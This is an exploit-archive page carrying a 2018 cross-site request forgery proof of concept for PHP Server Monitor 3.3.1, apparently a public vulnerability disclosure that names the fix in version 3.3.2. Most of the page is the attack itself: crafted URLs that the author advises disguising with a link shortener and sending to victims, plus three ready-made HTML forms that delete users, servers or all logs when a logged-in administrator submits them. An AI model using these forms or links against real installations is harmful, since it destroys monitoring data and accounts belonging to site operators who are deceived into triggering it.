PHP Server Monitor 3.3.1 Cross Site Request Forgery

PHP Server Monitor 3.3.1 Cross Site Request Forgery: Posted Dec 4, 2018; Authored by Javier Olmedo; PHP Server Monitor version 3.3.1 suffers from a cross site request forgery vulnerability.; tags | exploit, php, csrf; SHA-256 | d94289a27ecb3b1982a623c3c4d56b22d7b8c406405a0a88642bf566b1b57e03; Download | Favorite | View

PHP Server Monitor 3.3.1 Cross Site Request Forgery

# Exploit Title: PHP Server Monitor 3.3.1 - Cross-Site Request Forgery
# Exploit Author: Javier Olmedo
# Website: https://www.sidertia.com
# Date: 2018-11-28
# Google Dork: N/A
# Vendor: https://www.phpservermonitor.org/
# Software Link: https://github.com/phpservermon/phpservermon/releases/tag/v3.3.1
# Affected Version: 3.3.1 and possibly before
# Patched Version: update to 3.3.2
# Category: Web Application
# Platform: Windows & Ubuntu
# Tested on: Win10x64 & Kali Linux
# CVE: N/A
# References:
# https://github.com/phpservermon/phpservermon/issues/670
# https://www.sidertia.com/Home/Community/Blog/2018/11/28/Corregidas-las-vulnerabilidades-CSRF-descubiertas-en-PHP-Server-Monitor
   
# 1. Technical Description:
# PHP Server Monitor version 3.3.1 and possibly before are affected by multiple
# Cross-Site Request Forgery vulnerability, an attacker could remove users, logs,
# and servers.
 
# 2.1 Proof Of Concept (Delete User):

(Method 1)
Use Google URL Shortener (or similar) to shorten the next url (http://[PATH]/?&mod=user&action=delete&id=[ID]) and send it to the victim.

(Method 2)
Use next form and send it tho the victim.
<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://[PATH]/">
      <input type="hidden" name="mod" value="user" />
      <input type="hidden" name="action" value="delete" />
      <input type="hidden" name="id" value="[ID]" />
      <input type="submit" value="Delete User" />
    </form>
  </body>
</html>

# 2.2 Proof Of Concept (Delete Server):

(Method 1)
Use Google URL Shortener (or similar) to shorten the next url (http://[PATH]/?&mod=server&action=delete&id=[ID]) and send it to the victim.

(Method 2)
Use next form and send it tho the victim.
<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://[PATH]/">
      <input type="hidden" name="mod" value="server" />
      <input type="hidden" name="action" value="delete" />
      <input type="hidden" name="id" value="[ID]" />
      <input type="submit" value="Delete Server" />
    </form>
  </body>
</html>

# 2.3 Proof Of Concept (Delete All Logs):

(Method 1)
Use Google URL Shortener (or similar) to shorten the next url (http://[PATH]/?&mod=server_log&action=delete) and send it to the victim.

(Method 2)
Use next form and send it tho the victim.
<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://[PATH]/">
      <input type="hidden" name="mod" value="server_log" />
      <input type="hidden" name="action" value="delete" />
      <input type="submit" value="Delete All Logs" />
    </form>
  </body>
</html>

Top Authors In Last 30 Days

Red Hat 194 files
Ubuntu 67 files
Debian 24 files
Valentin Lobstein 11 files
nu11secur1ty 8 files
Apple 6 files
Google Security Research 5 files
malvuln 4 files
Ersin Erenler 4 files
E1.Coders 4 files

File Archives

Systems

AIX (429)
Apple (2,078)
BSD (376)
CentOS (58)
Cisco (1,927)
Debian (7,011)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,467)
HPUX (880)
iOS (373)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (49,194)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (488)
RedHat (15,473)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,437)
UNIX (9,390)
UnixWare (187)
Windows (6,649)
Other

PHP Server Monitor 3.3.1 Cross Site Request Forgery

PHP Server Monitor 3.3.1 Cross Site Request Forgery

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

PHP Server Monitor 3.3.1 Cross Site Request Forgery

Share This

PHP Server Monitor 3.3.1 Cross Site Request Forgery

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems